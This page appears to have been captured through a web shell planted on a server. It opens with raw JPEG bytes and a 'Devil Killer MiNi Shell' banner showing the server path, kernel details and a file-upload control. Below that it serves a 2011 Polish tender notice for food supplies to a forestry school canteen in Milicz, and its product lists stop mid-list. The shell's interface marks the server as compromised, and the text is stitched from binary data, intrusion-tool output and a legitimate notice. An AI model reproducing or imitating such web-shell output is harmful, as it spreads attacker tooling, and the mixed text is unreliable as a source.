JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110131/15532-N-2011.html

<p class="kh_header"><b>Milicz: Dostawa artykułów spożywczych do stołówki Zespołu Szkół Leśnych</b><br>
<b>Numer ogłoszenia: 15532 - 2011; data zamieszczenia: 31.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Leśnych , ul. Kasztelańska 1, 56-300 Milicz, woj. dolnośląskie, tel. 0-71 3840718, faks 0-71 3840718.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zslmilicz.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://zslmilicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Szkoła resortowa - Ministra Środowiska.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych do stołówki Zespołu Szkół Leśnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa do Internatu Zespołu Szkół Leśnych w Miliczu, al. ZHP1 spożywczych artykułów sypkich i półproduktów suchych, nabiału ziemniaków, mięsa i wędlin oraz pieczywa i ciasta  wyszczególnionych w układzie asortymentowo-ilościowym.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających nie przekraczającego 10% udzielonego zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie przewidziano</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena warunków wymaganych od oferentów zostanie dokonana według formuły spełnia - nie spełnia. Niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem oferenta.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena warunków wymaganych od oferentów zostanie dokonana według formuły spełnia - nie spełnia. Niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem oferenta.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena warunków wymaganych od oferentów zostanie dokonana według formuły spełnia - nie spełnia. Niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem oferenta.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena warunków wymaganych od oferentów zostanie dokonana według formuły spełnia - nie spełnia. Niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem oferenta.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena warunków wymaganych od oferentów zostanie dokonana według formuły spełnia - nie spełnia. Niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem oferenta.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-Wykaz środków transportu przewidywanych do realizacji zamówienia z załączoną kserokopią wpisu dokonanego przez PPIS do książki kontroli sanitarnej pojazdu o wyrażeniu zgody na transport artykułów spożywczych lub kserokopią decyzji PPIS o dopuszczeniu pojazdów do przewozu żywności (Rozporządzenie Ministra Zdrowia z dnia 19.12.2002 r. - Dz. U. z 2003 r. nr 21 poz. 179). W wykazie należy podać typ, markę i numer rejestracyjny pojazdu oraz status własności (pojazd własny, dzierżawiony lub inny). - dotyczy wszystkich zadań z wyjątkiem dostaw warzyw nieprzetworzonych oraz jaj. Wykonawca dostarczający warzywa nieprzetworzone oraz jaj nie musi okazywać kserokopii wskazanego dokumentu. 
- Kopię wydanego przez akredytowany podmiot certyfikatu potwierdzającego, że wykonawca spełnia wymagania systemu bezpieczeństwa zdrowotnego żywności HACCP, a w przypadku nieposiadania takiego certyfikatu podpisane przez wykonawcę oświadczenie, że WYKONAWCA wdrożył zasady i spełnia wymagania, o których mowa w ustawie o bezpieczeństwie żywności i żywienia. W oświadczeniu należy ponadto wyrazić zgodę na udostępnienie upoważnionym auditorom zamawiającego pomieszczeń produkcyjnych i magazynowych wykonawcy oraz dokumentacji z przeprowadzonej przez organ urzędowej kontroli żywności kontroli sanitarno-higienicznej, w celu sprawdzenia prawdziwości złożonych deklaracji - nie dotyczy zadania na dostawy warzyw nieprzetworzonych, jaj oraz gotowych produktów spożywczych. Dokument ten wymagany jest tylko od wykonawcy będącym jednocześnie producentem oferowanego przedmiotu zamówienia.
- Etykiety produktu dla wybranego oferowanego asortymentu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmianę ceny w trakcie trwania umowy o wskaźnik inflacji zgodnie z rozporządzeniem Ministra Finansów jednak nie częściej niż raz w roku kalendarzowym i wymaga to obustronnej pisemnej akceptacji</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zslmilicz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Leśnych
ul. Kasztelańska 1
56-300 Milicz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2011 godzina 10:00, miejsce: Zespół Szkół Leśnych
ul. Kasztelańska 1
56-300 Milicz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Deser (Danio lub podob.)	szt.	7250
Jogurt 150 ml	szt.	17400
Margaryna mleczna	kg.	290
Margaryna zwykła	kg.	290
Masło roślinne	kg.	1450
Masło śmietankowe	kg.	1740
Mleko 2% folia	L.	3625
Mleko 2% karton	L.	145
Ser topiony bloczek 100g	szt.	2175
Ser topiony krążek (8 w opak)	opak.	2175
Ser topiony plastry (8 w opak)	opak.	1450
Ser wędzony	kg.	145
Ser żółty (różne gat.)	kg.	1015
Serek homogenizowany	szt.	3625
Serek kiri 100g	szt.	580
Serek wiejski	szt.	725
Śmietana 12%	L.	725
Śmietana 18% 	L.	725
Śmietana 30%	L.	725
Twaróg półtłusty 	kg.	1160.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pieczywo zwykłe i cukiernicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Bułka drożdżówka	szt.	18850
2	Bułka tarta	kg.	725
3	Bułka zwykła	szt.	23200
4	Chleb 0,9 kg	szt.	15950
5	Chleb wiejski 2 kg.	kg.	290
6	Ciastka kruche	kg.	72,5
7	Ciasto z kremem 	kg.	72,5
8	Makowiec	kg.	72,5
9	Pączek	szt.	18850
10	Pierniki	kg.	72,5
11	Rogal	szt.	18850
12	Sernik	kg.	72,5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Ryby świeże i mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filety - dorsz	kg.	200
2	Filety - mintaj	kg.	300
3	Filety - miruna	kg.	200
4	Filety - morszczuk	kg.	200
5	Filety - panga	kg.	0
6	Karp	kg.	100
7	Kostka rybna	kg.	200
8	Makrela wędzona	kg.	200
9	Sałatka śledziowa	kg.	100
10	Śledź matjas	kg.	100
11	Śledź po wiejsku	kg.	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Warzywa Owoce krajowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Brokuły	szt.	290
2	Brukselka	kg.	580
3	Brzoskwinie krajowe	kg.	145
4	Buraki czerwone	kg.	2900
5	Cebula	kg.	2900
6	Czosnek krajowy	szt.	1450
7	Jabłka	kg.	1450
8	Kalafior	szt.	1450
9	Kalarepa	szt.	725
10	Kapusta biała	kg.	5800
11	Kapusta czerwona	kg.	2175
12	Kapusta kiszona	kg.	3625
13	Kapusta pekińska	kg.	1450
14	Koper zielony	pęcz.	2900
15	Marchew	kg.	5800
16	Ogórki kiszone	kg.	1740
17	Ogórki zielone gruntowe	kg.	1450
18	Ogórki zielone szklarniowe	kg.	725
19	Papryka 	kg.	290
20	Pietruszka korzeń	kg.	2175
21	Pietruszka zielona	pęcz.	2900
22	Pomidory gruntowe	kg.	725
23	Pomidory szklarniowe	kg.	1450
24	Por 	kg.	290
25	Porzeczka czarna 	kg.	870
26	Rzepa czarna	kg.	725
27	Rzodkiew biała	kg.	725
28	Rzodkiewka	pęcz.	1450
29	Sałata 	gł.	1450
30	Sałata lodowa	gł.	1450
31	Seler	kg.	2175
32	Szczypior	pęcz.	725
33	Wiśnia	kg.	870
34	Ziemniaki	kg.	29000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ananas puszka	szt.	43,5
2	Baton (..........................)	szt.	5800
3	Baton (..........................)	szt.	5800
4	Brzoskwinia puszka	szt.	43,5
5	Budyń (duże opakowanie ........)	szt.	14,5
6	Chrzan tarty (duże opakowanie ........)	szt.	72,5
7	chrzan tarty (małe opakowanie ........)	szt.	29
8	Ciastka deserowe ..................................	szt.	145
9	Ciastka deserowe ..................................	szt.	145
10	Cukier 	kg.	3625
11	Czekolada 100g (Goplana lub Wedel)	szt.	1450
12	Czosnek granulowany (duże opakowanie ........)	szt.	72,5
13	Ćwikła  (duże opakowanie ........)	szt.	290
14	Ćwikła  (małe opakowanie ........)	szt.	72,5
15	Dżem (duże opakowanie ........)	szt.	145
16	Fasola biała drobna (duże opakowanie ........)	kg.	435
17	Fasola biała Jaś gruby (duże opakowanie ........)	kg.	435
18	Fasola konserwowa biała (duże opakowanie ........)	szt.	29
19	Fasola konserwowa czerwona (duże opakowanie ........)	szt.	145
20	Flaki opak ok. 1kg	szt.	174
21	Frytura palmowa	kg.	870
22	Groch łuskany (duże opakowanie ........)	kg.	435
23	Groszek konserwowy (duże opakowanie ........)	szt.	145
24	Groszek konserwowy (małe opakowanie ........)	szt.	145
25	Herbata  granulowana 100g	szt.	870
26	Herbata  Lipton torebki 100 szt	szt.	29
27	Herbata  liściasta Madras 100g	szt.	290
28	Herbata  typu el grey 100g	szt.	290
29	Kakao 200g 	szt.	72,5
30	Kakao rozpuszczalne  	szt.	29
31	Kasza gryczana (duże opakowanie ........)	kg.	145
32	Kasza jęczmienna (duże opakowanie ........)	kg.	725
33	Kasza manna	kg.	29
34	Kawa Inka 200g	szt.	58
35	Kawa rozpuszczalna Jacobs 100g	szt.	29
36	Kawa rozpuszczalna Maxwell 100g	szt.	29
37	Kawa Tchibo mielona 250g	szt.	29
38	Ketchup 1 L	szt.	217,5
39	Ketchup wiadro 5kg	szt.	72,5
40	Kisiel (duże opakowanie ........)	szt.	29
41	Konserwa mięsna (gulasz angielski 160g)	szt.	1450
42	Konserwa rybna 170g (szprot, śledź)	szt.	1450
43	Koper suszony (duże opakowanie ........)	szt.	14,5
44	Kukurydza konserwowa (duże opakowanie ........)	szt.	58
45	kukurydza konserwowa (małe opakowanie ........)	szt.	145
46	Kwasek cytrynowy (małe opakowanie ........)	szt.	87
47	Liść laurowy (duże opakowanie ........)	szt.	14,5
48	Majeranek (duże opakowanie ........)	szt.	14,5
49	Majonez Winiary słoik 700 ml	szt.	290
50	Majonez Winiary wiadro	szt.	145
51	Makaron czaniecki 500g nitka 	szt.	435
52	makaron łazanka (duże opakowanie ........)	kg.	435
53	makaron muszelka (duże opakowanie ........)	kg.	435
54	Makaron rurka (duże opakowanie ........)	kg.	725
55	Makaron skrętka (duże opakowanie ........)	kg.	725
56	Makaron spaghetti (duże opakowanie ........)	kg.	362,5
57	Marmolada twarda (duże opakowanie ........)	szt.	72,5
58	Mąka tortowa 1 kg	kg.	870
59	Mąka wrocławska 1 kg	kg.	435
60	Mąka ziemniaczana 1 kg	kg.	145
61	Miód naturalny (małe opakowanie ........)	szt.	29
62	Musztarda  (1 kg)	szt.	217,5
63	Musztarda  (duże opakowanie ........)	szt.	29
64	Natka pietruszki suszona (duże opakowanie ........)	szt.	7,25
65	Ocet 0.5 l	szt.	145
66	Ogórki konserwowe (duże opakowanie ........)	szt.	174
67	Ogórki konserwowe (małe opakowanie ........)	szt.	145
68	Olej roślinny 1 L	szt.	290
69	Olej roślinny 5 L	szt.	725
70	Oregano (małe opakowanie ........)	szt.	29
71	Paluszki słone 100 g	szt.	72,5
72	Paluszki słone 300 g	szt.	72,5
73	Papryka chilli (duże opakowanie ........)	kg.	7,25
74	Papryka konserwowa (duże opakowanie ........)	szt.	72,5
75	Papryka mielona ostra  (duże opakowanie ........)		7,25
76	Papryka mielona słodka  (duże opakowanie ........)	szt.	29
77	Pasta pomidorowa 30% puszka (ok 1 kg)	szt.	72,5
78	Pasta pomidorowa 30% puszka (ok 4 kg)	szt.	72,5
79	Pasztet drobiowy 160g 	szt.	2175
80	Pasztet wieprzowy ok. 1kg.	szt.	72,5
81	Peperonata (duże opakowanie ........)	szt.	29
82	Pieczarki marynowane (duże opakowanie ........)	szt.	29
83	pieczarki marynowane (małe opakowanie ........)	szt.	29
84	Pieprz naturalny 1 kg.	szt.	58
85	Płatki kukurydziane (duże opakowanie ........)	szt.	72,5
86	Płatki kukurydziane czekoladowe (duże opakowanie ........)	szt.	145
87	Pomidory krojone (duże opakowanie ........)	szt.	29
88	Przyprawa Degusta wiaderko	kg.	29
89	Przyprawa do bigosu	kg.	14,5
90	Przyprawa do drobiu 	kg.	58
91	Przyprawa do gulaszu (duże opakowanie ........)	szt.	7,25
92	Przyprawa do mięs 	kg.	116
93	Przyprawa do ryb 	kg.	21,75
94	Przyprawa do zup (5 L) 	szt.	29
95	Przyprawa do zup (butelka 1L) 	L.	29
96	Przyprawa Gyros (duże opakowanie .......)	szt.	8,7
97	Przyprawa Kucharek wiaderko	kg.	29
98	Przyprawa Prymat  (duże opakowanie ........)	szt.	29
99	Przyprawa szefa (duże opakowanie ........)	szt.	58
100	Przyprawa Vegeta wiaderko	kg.	29
101	Przyprawa Warzywko wiaderko	kg.	29
102	Rodzynki 200g	szt.	14,5
103	Ryż (duże opakowanie ........)	kg.	725
104	Ryż (małe opakowanie ........)	kg.	145
105	Sałatki obiadowe (słoik 1L) .......................................	szt.	145
106	Sałatki obiadowe (słoik 1L) .......................................	szt.	145
